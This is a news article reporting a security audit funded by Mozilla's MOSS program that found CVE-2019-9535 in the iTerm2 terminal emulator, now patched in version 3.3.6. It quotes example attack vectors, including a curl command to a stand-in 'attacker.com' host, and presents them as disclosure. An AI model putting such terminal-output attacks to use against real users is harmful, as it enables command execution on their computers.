“We expect the community will find many more creative examples…”
A security audit funded by the Mozilla Open Source Support Program (MOSS) has discovered a critical security bug in iTerm2: a popular open source alternative to Apple’s Terminal — which provides a command line interface to control the UNIX-based operating system sitting below macOS.
Mozilla, iTerm2’s developers and Radically Open Security, the not-for-profit security company contracted to probe iTerm2’s security, have urged users to update the software, which has now been patched. The issue had been sitting in the open (hopefully) unnoticed for approximately seven years, they said.
iTerm2 is one of the most popular terminal emulators in the world, and frequently used by developers, Mozilla noted, saying: “MOSS selected iTerm2 for a security audit because it processes untrusted data and it is widely used, including by high-risk targets (like developers and system administrators).
(Apple’s Terminal is widely looked down upon for lacking various functions. iTerm, by contrast, is seen as hugely feature-rich for power UNIX users).
Mozilla’s Tom Ritter said: “An attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer.
“Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log.”
He added drily: “We expect the community will find many more creative examples.
MOSS said: “Typically this vulnerability would require some degree of user interaction or trickery; but because it can be exploited via commands generally considered safe there is a high degree of concern about the potential impact.”
The vulnerability has been assigned CVE-2019-9535.
iTerm2’s team said they recommend a proactive immediate update by going to the iTerm2 menu and choosing Check for updates…
The fix is available in version 3.3.6.
Netherlands-based Radically Open Security is a not-for-profit computer security company legally established as a ‘Fiscaal Fondsenwervende Instelling’ (fiscal fundraising institution) in the Netherlands. This summer it donated 90 percent of its net profit to an internet charity, NLnet, that supports open source technology and open internet research and development.